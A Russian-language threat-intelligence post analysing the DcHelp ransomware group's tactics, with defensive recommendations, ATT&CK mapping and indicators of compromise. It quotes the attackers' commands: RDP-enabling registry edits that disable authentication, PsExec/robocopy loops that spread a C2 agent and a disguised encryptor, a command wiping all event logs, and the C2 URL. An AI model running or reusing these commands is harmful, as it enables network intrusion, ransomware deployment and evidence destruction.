Разбирая очередной инцидент, связанный с атакой шифровальщика, и услышав в очередной раз вопрос «как же так, ведь у нас есть антивирус!?», мы решили поделиться с комьюнити информацией о возобновившейся активности группировки DсHelp.

В этой статье расскажем про участившиеся атаки DсHelp, рассмотрим тактики и техники данной группы, а также отметим, почему антивирус — не панацея и как легитимное ПО может быть использовано против вас.

Злоумышленники все чаще стали использовать в своих атаках абсолютно легитимные инструменты, в том числе инструменты для шифрования данных, которые не вызывают подозрений у антивирусного ПО. Разберем одну из таких групп, активность которой возросла в конце 2024 года.

Профайл DcHelp

DсHelp (Enigma Wolf) — группа злоумышленников, атакующая организации различных отраслей и использующая для шифрования данных компьютеров и серверов программное обеспечение с открытым исходным кодом DiskCryptor.

При успешной атаке на инфраструктуру злоумышленники связываются с пострадавшими посредством e-mail, Telegram или иным способом и требуют приобрести пароль, чтобы вернуть доступ к данным. Сумма выкупа варьируется от $1 000 до $100 000. Оплату берут в Bitcoin, но возможно использование и другой криптовалюты.

На момент публикации активен сайт https://dchelp.org/, на котором можно ознакомиться с FAQ и даже оставить обратную связь:

Группировка DcHelp активна как минимум с конца 2022 года, недавние инциденты с ее участием зафиксированы и расследованы командой Jet CSIRT во втором полугодии 2024 года.

Как атакует DcHelp

Начало атаки

Для получения первоначального доступа к инфраструктуре своих жертв DcHelp в основном ориентируется на «низковисящие фрукты» и эксплуатирует уязвимости публично доступных сервисов, проводит атаки подбора паролей, а также использует легитимные аутентификационные данные, купленные у брокеров первоначального доступа или обнаруженные в утечках.

Получив доступ на узел, злоумышленники первым делом проводят разведку и изучают окружение — например, информацию о пользователе, группах, контроллерах домена:

whoami

net user <redacted> /domain

net localgroup /domain

netdom query dc

net group «Администраторы домена» /domain

В случае если доступ к системе был получен с непривилегированной учетной записью, злоумышленники повышают привилегии и проводят поиск учетных данных в системе. Для этого они используют следующие инструменты:

  • Mimikatz;

  • PWVIEWER (Password Viewer);

  • PWDCRACKU (Password Cracker);

  • ARestore (Account Restore).

Также злоумышленники ищут информацию о паролях в доступных для чтения файлах и в каталогах, используя встроенные в операционные системы механизмы поиска, а также ищут сохраненные пароли в браузерах и электронной почте.

Для сбора дополнительной информации об инфраструктуре злоумышленники используют:

  • Advanced IP Scanner;

  • Advanced Port Scanner;

  • команды PowerShell.

Пример команды PowerShell:

Get-ADComputer -Filter * -Properties * | Sort ipv4* | FT Name, ipv4, oper, LastLogonDate -Autosize

Собранная информация зачастую сохраняется прямо на скомпрометированных системах во временный каталог C:\tmp\:

  • host.txt\hosts.txt

  • computers.txt\AdComputers.txt

Закрепление, распространение

После получения информации об инфраструктуре в своих атаках злоумышленники активно используют батники для распространения и запуска ВПО. Например, один из скриптов изменяет параметры реестра ОС Windows, разрешая удаленные подключения по RDP:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f

Для закрепления в инфраструктуре злоумышленники используют MeshAgent, который компилируется с указанием собственного С2-сервера:

  • C:\tmp\mesh.exe (также могут использоваться имена — meshagent32.exe, meshagent-[domain].exe и др.)

MeshAgent получает инструкции по подключению из файла .msh, в формате "ключ=значение". Этот файл не всегда можно обнаружить на скомпрометированных системах, при этом можно извлечь интересующие нас строки из исполняемого файла MeshAgent:

MeshServer=wss://techsupport.myftp.org:443/agent.ashx

Данный С2-сервер оставался неизменным в нескольких атаках.

Распространение ВПО в инфраструктуре производится с использованием утилиты robocopy:

for /f "delims=" %%i in (host.txt) do (

  start robocopy %systemdrive%\tmp\tmp \\%%i\C$\tmp /R:0

ping 127.0.0.1 -n 1

)

Установка и запуск ВПО производится с использованием PsExec:

for /f "delims=" %%i in (host.txt) do (

start psexec.exe -accepteula \\%%i -s C:\tmp\mesh.exe -fullinstall

ping 127.0.0.1 -n 1

)

for /f "delims=" %%i in (host.txt) do (

start psexec.exe -accepteula \\%%i -s sc start "mesh agent"

ping 127.0.0.1 -n 1

)

for /f "delims=" %%i in (host.txt) do (

start psexec.exe -accepteula \\%%i -s C:\tmp\Notepad.bat

start psexec.exe -accepteula \\%%i -s C:\tmp\notepad.exe /SP- /TASKS="" /NOICONS /VERYSILENT /RESTART /SUPPRESSMSGBOXES /NOCANCEL

ping 127.0.0.1 -n 1

)

В качестве средств шифрования используется ПО с открытым исходным кодом DiskCryptor, при этом хэш исполняемого файла может отличаться от инцидента к инциденту, поскольку конкретный экземпляр может быть скомпилирован непосредственно перед атакой. Злоумышленники маскируют данное ПО под другие легитимные программы, например Notepad.exe.

Интересно, что при наличии в инфраструктуре (и возможности компрометации) сервера Kaspersky Security Center злоумышленники предпочитают использовать его функционал для запуска задач по распространению и установке ВПО на конечных узлах:

Распространение MeshAgent через скомпрометированный KSC:

Event 7045, A service was installed in the system.

Service: KL Deployment Wrapper

User: \System

Path: C:\Windows\TEMP\KAVREM~1\C19BB5~4\setup.exe /s /z/p\"TASK_ID=c12xx345-f67x-8910-11x1-21xbz31z4151\"

StartType: Автоматически

Cmdline: C:\Windows\Temp\KAVREM~1\C123BB4~5\exec\m.exe

Impact

После всех подготовительных действий злоумышленники производят шифрование инфраструктуры путем исполнения аналогичных батников, запускающих шифрование на каждом узле из списка в файле host.txt.

Пароль для шифрования создается алгоритмом, описанным в батнике, при этом используется функция генерации случайных чисел, а длина пароля составляет 13 символов (латинские буквы и цифры). Шифрование происходит криптостойкими алгоритмами (AES-256, Twofish, Serpent). Сгенерированные пароли для шифрования копируются злоумышленниками и удаляются после завершения процесса шифрования.

Далее могут затираться следы пребывания на узле путем очистки журналов ОС:

cmd - for /F tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Возможно ли восстановление?

В ходе расследования инцидентов среди удаленных файлов нам удалось восстановить несколько паролей, что позволило расшифровать часть серверов.

Если с момента инцидента система не перезагружалась, есть шансы извлечь пароли из оперативной памяти. При этом мы не рекомендуем полагаться на везение, а применять лучшие практики по созданию бэкапов. Принцип «3-2-1» никто не отменял, но в рамках расследований мы редко видим эталонное соблюдение данного принципа. И, конечно же, не стоит хранить бэкапы в единственном экземпляре на том же устройстве или в том же сетевом сегменте.

Lessons learned

В современных атаках злоумышленники часто используют абсолютно легитимные инструменты с точки зрения СЗИ для снижения вероятности обнаружения их активности.

Так, используемая связка DiskCryptor, MeshAgent, PsExec не будет вызывать подозрений у установленного антивируса, разве что возможен детект с формулировкой вроде *not-a-virus*. Кроме того, такая атака может быть реализована с использованием других легитимных инструментов: например, шифровальщик ShrinkLocker использует встроенный в Windows Bitlocker.

Расследование инцидента должно заканчиваться этапом «lessons learned», в ходе которого отмечаются те факторы, которые привели к инциденту, разрабатываются меры по недопущению подобных инцидентов в будущем. Конечно, рекомендации будут сильно зависеть от конкретной организации и произошедшего инцидента, используемых технологий и возможностей.

В качестве общих рекомендаций выделим следующие:

  • стоит начать с Attack Surface Management и посмотреть на свою инфраструктуру глазами злоумышленников, после чего убрать все «низковисящие фрукты»: установить недостающие обновления и убрать «лишние» активы с внешнего периметра;

  • одна из наиболее эффективных мер повышения уровня защищенности — доступ в инфраструктуру из внешних сетей с использованием VPN с двухфакторной аутентификацией.

  • обеспечьте резервное копирование критичных систем, причем при реализации системы резервного копирования и восстановления придерживайтесь правила «3-2-1» (хранить по меньшей мере три копии данных, из них две копии — на двух разных носителях, третья копия — на отчуждаемых носителях).

Приложения

MITRE ATT&CK:

Тактика

Техника

Описание

Initial access

T1133    External Remote Services

Злоумышленники используют службы удаленного доступа с возможностью внешнего подключения для получения первоначального доступа к сети и (или) закрепления в ней

Initial access

T1190    Exploit Public-Facing Application

Злоумышленники эксплуатируют уязвимости систем, доступных из сети Интернет. Например, популярные уязвимости MS Exchange — ProxyLogon, ProxyShell

Initial access

T1078    Valid Accounts

Злоумышленники используют легитимные учетные данные для первоначального доступа, закрепления, повышения уровня привилегий или предотвращения обнаружения

Execution

T1059  Command and Scripting Interpreter

T1059. 001 PowerShell

T1059. 003 CMD

Злоумышленники активно используют интерпретаторы командной строки и сценариев для выполнения команд или запуска сценариев и исполняемых файлов

Persistence

T1136    Create Account

T1136.002 Local Accounts

T1136.002 Domain Accounts

Злоумышленники в ходе атак создают учетные записи для закрепления в инфраструктуре

Persistence

T1078    Valid Accounts

T1078.002 Domain Accounts

Злоумышленники используют скомпрометированные УЗ в ходе атаки

Privilege Escalation

T1078    Valid Accounts

T1078.002 Domain Accounts

T1078.003 Local Accounts

Для повышения привилегий используют скомпрометированные легитимные доменные и локальные учетные записи

 

Defense Evasion

T1036.005 Masquerading

Злоумышленники маскируют используемое ВПО под другие легитимные программы

Defense Evasion

T1562.001 Impair Defenses: Disable or Modify Tools

Злоумышленники отключают средства защиты, а также изменяют их настройки

 

Credential Access

T1003 OS Credential Dumping

.001       LSASS Memory

Злоумышленники получают аутентификационные данные из памяти процесса LSASS.

Credential Access

T1552 Unsecured Credentials

.001  Credentials In Files

Злоумышленники ищут аутентификационные данные в доступных файлах на скомпрометированных узлах

Credential Access

T1555.003 Credentials from Web Browsers

Злоумышленники проводят поиск сохраненных паролей в браузерах

Credential Access

T1555.005 Password Managers

Злоумышленники проводят поиск сохраненных паролей в парольных менеджерах

Discovery

T1046 Network Service Discovery

Злоумышленники проводят сканирование и поиск уязвимых ресурсов (Advanced IP Scanner, Advanced Port Scanner)

Discovery

T1087.001

Account Discovery:

Local Account

Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer

Discovery

T1087.002

Account Discovery:

Domain Account

Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer

Discovery

T1069.001

Permission Groups

Discovery: Local Groups

Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer

Discovery

T1069.001

Permission Groups

Discovery: Domain Groups

Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer

Discovery

T1083 File and Directory Discovery

Злоумышленники просматривают файлы и каталоги в скомпрометированных системах

Discovery

T1217 Browser Information Discovery

Злоумышленники просматривают информацию, которая хранится в браузерах, чтобы узнать больше о скомпрометированных средах, а также для того, чтобы завладеть аутентификационными данными

Lateral Movement

T1021 Remote Services

T1021.001 RDP

T1021.002 SMB

T1021.004 SSH

Злоумышленники используют службы удаленного доступа и протоколы удаленного доступа для перемещения внутри инфраструктуры

Lateral Movement

T1570 Lateral Tool Transfer

Злоумышленники передают инструменты или другие файлы между системами в скомпрометированных системах (например, SMB, RDP, PsExec)

Command and Control

T1219    Remote Access Software

Злоумышленники используют стороннее ПО для обеспечения удаленного доступа и установления интерактивного канала управления и контроля в целевых системах

Impact

T1529 System Shutdown/Reboot

Злоумышленники могут выключать/перезагружать системы, чтобы ограничить доступ к этим системам, снизить шансы на восстановление паролей и перезатереть данные в оперативной памяти

Impact

T1486    Data Encrypted for Impact

Злоумышленники шифруют данные с целью получения выкупа

IoCs, сетевые индикаторы компрометации:

№ п/п

IP-адрес

Страна

ASN

Дополнительная информация

1.      

159.100.22.162

DE

 AS 44066

С2-сервер techsupport.myftp[.]org

IoCs, файловые индикаторы компрометации:

№ п/п

Наименование файла

Хэш

Информация

1.      

RDPRemoteEnabler_Free.exe

MD5: f4193a842a3f9ca03f687c7515e330ac

SHA-1: 229b429820f63b9aa83cb1fd9a29c5c8d0410dd2

SHA-256: 9efa419cc3bb00ebb0f101685ff86b09a78ea230415ad09e7044e90fb357d6b2

Изменение параметров Windows для разрешения подключений по RDP

2.      

advanced_port_scanner_2.5.3869.exe

MD5:

6a58b52b184715583cda792b56a0a1ed

SHA-1:

3477a173e2c1005a81d042802ab0f22cc12a4d55

SHA-256:

d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb

Сетевой сканер

3.      

clear.bat

MD5:

9b6becd8aeb8a42e70a6200a40600100

SHA-1:

4470d0f7d52eb130816cced2638f1b3300ee70c4

SHA-256:

b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf

Скрипт для очистки журналов ОС

4.      

mesh.exe 

SHA1:

39F9CAA77483E26337F598E04F8C6166

MeshAgent

5.      

meshagent32.exe

SHA1:

b4a5f9f3af3cef951259675128cf56808832d91a

MeshAgent

6.      

notepad.exe

MD5:

def004f1ed671f0627970ecbf241371e

SHA-1:

98f4e14d9378ff50ab882ad37263465fa0cf8d31

SHA-256:

018d0b2af8479147def984a4c6a0db31703baacd87557d51271ad8c952f450b8

DiskCryptor

7.      

universaltermsrvpatch-x64.exe

MD5:

0546abe6293ba40348e1734fafca47ec

SHA-1:

37c0d892b38bbf9d8c6a8d35db5b32555cb758c8

SHA-256:

5161cdafd0c6d79616d775f79214b2e7e3ad13de71db63e9fa6bfc448ba4084b

ПО для изменения параметров Windows, разрешения мультисессий RDP

8.      

ARestore.exe

MD5

7f86b67ac003eda9d2929c9317025013

SHA-1

343051cc1b3f33201d076478ea9badc796951423

SHA-256

fcea81909388611359bbaf41871300075e192a3246b9e1bebc5f3f0aaa2b2c9a

hacktool.bruteforce/msil

Комментарии (1)


  1. 9241304
    20.11.2024 20:14

    Зато у так называемого антивирусного ПО вызывает подозрения простой hello world на плюсах. 20 лет назад хотя бы такого позора не было